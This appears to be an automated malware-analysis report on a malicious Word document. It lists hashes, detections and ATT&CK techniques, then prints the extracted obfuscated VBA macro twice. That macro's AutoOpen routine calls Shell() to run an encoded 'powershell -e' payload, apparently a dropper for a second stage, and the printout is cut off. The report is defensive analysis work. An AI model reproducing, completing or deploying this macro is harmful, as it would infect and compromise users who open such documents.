Office (OLE) malware analysis — malicious · f2e119823ecb7aa1

MALICIOUS

Office (OLE)

120.5 KB Created: 2018-06-12 16:57:00 Authoring application: Microsoft Office Word First seen: 2019-01-31

MD5: fac449c087c41843cbb7b6d7a1dc3973 SHA-1: fcc419d88f9c0697a30f449310aef0ce45552f1c SHA-256: f2e119823ecb7aa1bfc1286c5115061268c68c7e00a1ae824af2f0fa3afe7b4e

242 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1059 Command and Scripting Interpreter T1204.002 Malicious File

The sample contains a VBA macro with an Autoopen subroutine that calls the Shell() function. This indicates the document is designed to execute arbitrary commands upon opening. The ClamAV detection 'Doc.Dropper.Agent-6582866-0' further supports its malicious nature as a dropper. The VBA code attempts to construct and execute a command, likely to download and run a second-stage payload.

Heuristics 7

ClamAV: Doc.Dropper.Agent-6582866-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Dropper.Agent-6582866-0
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 14354 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	14354 bytes
SHA-256: `489464b6f857951377de58ae34b851b6917248275d23dbcb6651f85796e5d0a7`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "dZYNlkqmVlnSTo" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Function YVSaMwprp() On Error Resume Next dkCXw = Tan(39429) OsMHK = IfYHXt rDJcfm = CDbl(VcnRVj) JNwur = wlqzC lXnJiO = Hex(BZZbZ * ChrW(LfhlFv + Int(bozRZM * Rnd(60803)) * oFNKa * Log(64638 * RhTFD - hhjmY + Fix(51)))) frOzl = Tan(8130) WzXVj = Tan(41638) fNTMRz = LOASz QtHQfB = CDbl(ziaFc) JLDtL = jUpUNW ZrUdO = Hex(lMAcpH * ChrW(iLjAnN + Int(LqzHUo * Rnd(64812)) * XaYtt * Log(21285 * SiBLXr - IiOlVC + Fix(51)))) kphAm = Tan(18752) YVSaMwprp = PQXYU + Shell(wUYPirUEHzj + Chr(jYjlQOo + vbKeyP + OnWzJaIkz) + "owers" + lwYWqPK + cGAOOW + hUPvhqRSlZ + NZCjzLtKR + bJWklbffJkO + NfkhASQMB, 74929 - 74929) sNIZAV = Tan(78284) DvOiG = EwbptR QtjSfs = CDbl(lrtGBs) RtlXWE = iSXqvf qGKtsB = Hex(UYGUcC * ChrW(MBHdNS + Int(FpRXMw * Rnd(72136)) * McjMGv * Log(70982 * NIrwwU - CtCuSQ + Fix(51)))) NhNsl = Tan(31402) End Function Sub Autoopen() On Error Resume Next WfCqtM = Tan(59333) QvsbSu = WUqkL dJDTK = CDbl(OBzNKU) rdoHDI = RdHCqz sLsBA = Hex(dsWwX * ChrW(PPjQih + Int(bCrhM * Rnd(75712)) * LzACBd * Log(24841 * WqGLJP - wGqkU + Fix(51)))) jiMZVi = Tan(42803) YVSaMwprp BdjOZ = Tan(88014) rUztVn = sJWXrO krbSi = CDbl(Oodfuq) VNazk = jHmtq FqpCCz = Hex(IOQlFw * ChrW(SRDrRz + Int(fYfjZm * Rnd(42661)) * wwwkTd * Log(71143 * laiDi - FbUBuD + Fix(51)))) EvbrU = Tan(49948) End Sub Attribute VB_Name = "JTdLUaSRn" Function lwYWqPK() On Error Resume Next OdjKzq = Tan(44865) GLqTp = WSBqYV GYRzt = CDbl(Gsqfrv) JNbAzC = jwRpV fGBXE = Hex(rWIERM * ChrW(wRRQf + Int(XthIrB * Rnd(82643)) * CbJGc * Log(53810 * OzrTbu - ZBIKn + Fix(51)))) FCRjmp = Tan(96597) IknVAzA = "HeLL -e IAAoAC" + "AAT" + "gBlAHcALQBvAEI" + "AagBFAGM" + "AVAAgACAAUw" + "BZAHMAVA" zzKVN = Tan(50165) vwwokY = SawDFT fAjNv = CDbl(AJdUn) LQBjzN = PdCKW WXkrj = Hex(jizRzd * ChrW(SIplV + Int(AHNRQt * Rnd(98108)) * lEqdqK * Log(21078 * uQRtm - wLwED + Fix(51)))) vLZsjj = Tan(41514) lfPiRXlU = "BFAG0A" + "LgBpAG" + "8ALg" + "BjAG8AT" + "QBwAFIARQBzA" + "FMASQBPAG" + "4ALgBkAGUA" JFTwks = Tan(96853) JoGSzt = ZUcrw CSMpJ = CDbl(ZiwwJo) PowTI = FYBKzk CwAXEp = Hex(nHmGI * ChrW(wYvKsw + Int(iiacAT * Rnd(94338)) * jAIPFR * Log(84293 * darUQb - BqLhw + Fix(51)))) crRAGJ = Tan(46536) ULHkUvcWvaI = "ZgBMAEEAdABlAFM" + "AVABSAGUAQQ" + "BNAC" + "gAWwBzAFkA" + "Uw" + "B0AG" + "UA" + "bQAuAEkAT" YXlsh = Tan(7337) irCJG = SkAcNG ZlplA = CDbl(HJqOw) THFDG = jXAXzI plKGR = Hex(sDBzm * ChrW(zrWwzn + Int(DBmoMh * Rnd(89060)) * iiVBm * Log(62584 * LYwCZ - GERJSU + Fix(51)))) kMbCk = Tan(44692) TmNDG = "wA" + "uA" + "G0ARQBtAE" + "8AcgB5AHMAVABy" + "AGUAYQBNAF0AI" XDzzZ = Tan(44495) NVjvA = ljzzv lzwUi = CDbl(MnPSGS) PbqHa = dCSsil SSUEO = Hex(HWlHai * ChrW(DMjIv + Int(NdkZv * Rnd(47419)) * ASLSE * Log(26682 * PbuSKD - LvdUQZ + Fix(51)))) wQSJz = Tan(39217) szQIo = "AB" + "bA" + "HMAWQBzAFQA" + "RQBNAC4" kisZf = Tan(84645) pKTCMz = bSQws CiHFfz = CDbl(EBsIH) LitBti = DVkJS ZDUwB = Hex(FlVCa * ChrW(tjcXoS + Int(vToZi * Rnd(32792)) * Thfjw * Log(95106 * cZMjCq - CIpcSN + Fix(51)))) wijhRw = Tan(44191) iniWnZjk = "AQwBvAG4AVgBlA" + "FIAVABdADoAOg" + "BGAFI" + "AbwBt" + "AEIAQQBzAGUANgA" + "0AHMAVAByAEkATg" + "BnACgAIAAnAFYA" lilhis = Tan(46159) pDdAR = QnlbO KwwPDX = CDbl(wwzjw) roizV = DiCAY NhsSsv = Hex(kiZmhW * ChrW(GYZGpX + Int(kaRipQ * Rnd(28569)) * OHwYa * Log(81403 * cjFDqO - RBAbrG + Fix(51)))) EwKBKc = Tan(14479) zOzdUSdz = "WgBCAG" + "IAVAA4AEoAQQB" + "FA" + "EkAWAAv" + "AHkAagA0A" + "DAASwBVAF" + "QAWgAxAGk" + "AQgA0AGEA" jDfbZP = Tan(35030) IwnQvt = mhQwI hOZIf = CDbl(LoWPO) CwCYOo = zOrfD jKvXUu = Hex(wKCpFS * ChrW(FGzmjZ + Int(tzzNSc * Rnd(54600)) * CpiVS * Log(91552 * PQCVkj - uNSvtQ + Fix(51)))) OFwdIp = Tan(26121) ZLEPSIU = "VQB4AEUASwBWA" + "DQAaABhAEEAMw" + "A0AFkARwBLADI" + "AeQA5AGc" + "AdQBiAEg" + "AZgByAG" ... (truncated)

SHA-256: 489464b6f857951377de58ae34b851b6917248275d23dbcb6651f85796e5d0a7

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "dZYNlkqmVlnSTo"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function YVSaMwprp()
On Error Resume Next
dkCXw = Tan(39429)
OsMHK = IfYHXt
rDJcfm = CDbl(VcnRVj)
JNwur = wlqzC
lXnJiO = Hex(BZZbZ * ChrW(LfhlFv + Int(bozRZM * Rnd(60803)) * oFNKa * Log(64638 * RhTFD - hhjmY + Fix(51))))
frOzl = Tan(8130)
WzXVj = Tan(41638)
fNTMRz = LOASz
QtHQfB = CDbl(ziaFc)
JLDtL = jUpUNW
ZrUdO = Hex(lMAcpH * ChrW(iLjAnN + Int(LqzHUo * Rnd(64812)) * XaYtt * Log(21285 * SiBLXr - IiOlVC + Fix(51))))
kphAm = Tan(18752)
YVSaMwprp = PQXYU + Shell(wUYPirUEHzj + Chr(jYjlQOo + vbKeyP + OnWzJaIkz) + "owers" + lwYWqPK + cGAOOW + hUPvhqRSlZ + NZCjzLtKR + bJWklbffJkO + NfkhASQMB, 74929 - 74929)
sNIZAV = Tan(78284)
DvOiG = EwbptR
QtjSfs = CDbl(lrtGBs)
RtlXWE = iSXqvf
qGKtsB = Hex(UYGUcC * ChrW(MBHdNS + Int(FpRXMw * Rnd(72136)) * McjMGv * Log(70982 * NIrwwU - CtCuSQ + Fix(51))))
NhNsl = Tan(31402)
End Function
Sub Autoopen()
On Error Resume Next
WfCqtM = Tan(59333)
QvsbSu = WUqkL
dJDTK = CDbl(OBzNKU)
rdoHDI = RdHCqz
sLsBA = Hex(dsWwX * ChrW(PPjQih + Int(bCrhM * Rnd(75712)) * LzACBd * Log(24841 * WqGLJP - wGqkU + Fix(51))))
jiMZVi = Tan(42803)
YVSaMwprp
BdjOZ = Tan(88014)
rUztVn = sJWXrO
krbSi = CDbl(Oodfuq)
VNazk = jHmtq
FqpCCz = Hex(IOQlFw * ChrW(SRDrRz + Int(fYfjZm * Rnd(42661)) * wwwkTd * Log(71143 * laiDi - FbUBuD + Fix(51))))
EvbrU = Tan(49948)
End Sub


Attribute VB_Name = "JTdLUaSRn"
Function lwYWqPK()
On Error Resume Next
OdjKzq = Tan(44865)
GLqTp = WSBqYV
GYRzt = CDbl(Gsqfrv)
JNbAzC = jwRpV
fGBXE = Hex(rWIERM * ChrW(wRRQf + Int(XthIrB * Rnd(82643)) * CbJGc * Log(53810 * OzrTbu - ZBIKn + Fix(51))))
FCRjmp = Tan(96597)
IknVAzA = "HeLL -e IAAoAC" + "AAT" + "gBlAHcALQBvAEI" + "AagBFAGM" + "AVAAgACAAUw" + "BZAHMAVA"
zzKVN = Tan(50165)
vwwokY = SawDFT
fAjNv = CDbl(AJdUn)
LQBjzN = PdCKW
WXkrj = Hex(jizRzd * ChrW(SIplV + Int(AHNRQt * Rnd(98108)) * lEqdqK * Log(21078 * uQRtm - wLwED + Fix(51))))
vLZsjj = Tan(41514)
lfPiRXlU = "BFAG0A" + "LgBpAG" + "8ALg" + "BjAG8AT" + "QBwAFIARQBzA" + "FMASQBPAG" + "4ALgBkAGUA"
JFTwks = Tan(96853)
JoGSzt = ZUcrw
CSMpJ = CDbl(ZiwwJo)
PowTI = FYBKzk
CwAXEp = Hex(nHmGI * ChrW(wYvKsw + Int(iiacAT * Rnd(94338)) * jAIPFR * Log(84293 * darUQb - BqLhw + Fix(51))))
crRAGJ = Tan(46536)
ULHkUvcWvaI = "ZgBMAEEAdABlAFM" + "AVABSAGUAQQ" + "BNAC" + "gAWwBzAFkA" + "Uw" + "B0AG" + "UA" + "bQAuAEkAT"
YXlsh = Tan(7337)
irCJG = SkAcNG
ZlplA = CDbl(HJqOw)
THFDG = jXAXzI
plKGR = Hex(sDBzm * ChrW(zrWwzn + Int(DBmoMh * Rnd(89060)) * iiVBm * Log(62584 * LYwCZ - GERJSU + Fix(51))))
kMbCk = Tan(44692)
TmNDG = "wA" + "uA" + "G0ARQBtAE" + "8AcgB5AHMAVABy" + "AGUAYQBNAF0AI"
XDzzZ = Tan(44495)
NVjvA = ljzzv
lzwUi = CDbl(MnPSGS)
PbqHa = dCSsil
SSUEO = Hex(HWlHai * ChrW(DMjIv + Int(NdkZv * Rnd(47419)) * ASLSE * Log(26682 * PbuSKD - LvdUQZ + Fix(51))))
wQSJz = Tan(39217)
szQIo = "AB" + "bA" + "HMAWQBzAFQA" + "RQBNAC4"
kisZf = Tan(84645)
pKTCMz = bSQws
CiHFfz = CDbl(EBsIH)
LitBti = DVkJS
ZDUwB = Hex(FlVCa * ChrW(tjcXoS + Int(vToZi * Rnd(32792)) * Thfjw * Log(95106 * cZMjCq - CIpcSN + Fix(51))))
wijhRw = Tan(44191)
iniWnZjk = "AQwBvAG4AVgBlA" + "FIAVABdADoAOg" + "BGAFI" + "AbwBt" + "AEIAQQBzAGUANgA" + "0AHMAVAByAEkATg" + "BnACgAIAAnAFYA"
lilhis = Tan(46159)
pDdAR = QnlbO
KwwPDX = CDbl(wwzjw)
roizV = DiCAY
NhsSsv = Hex(kiZmhW * ChrW(GYZGpX + Int(kaRipQ * Rnd(28569)) * OHwYa * Log(81403 * cjFDqO - RBAbrG + Fix(51))))
EwKBKc = Tan(14479)
zOzdUSdz = "WgBCAG" + "IAVAA4AEoAQQB" + "FA" + "EkAWAAv" + "AHkAagA0A" + "DAASwBVAF" + "QAWgAxAGk" + "AQgA0AGEA"
jDfbZP = Tan(35030)
IwnQvt = mhQwI
hOZIf = CDbl(LoWPO)
CwCYOo = zOrfD
jKvXUu = Hex(wKCpFS * ChrW(FGzmjZ + Int(tzzNSc * Rnd(54600)) * CpiVS * Log(91552 * PQCVkj - uNSvtQ + Fix(51))))
OFwdIp = Tan(26121)
ZLEPSIU = "VQB4AEUASwBWA" + "DQAaABhAEEAMw" + "A0AFkARwBLADI" + "AeQA5AGc" + "AdQBiAEg" + "AZgByAG"
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.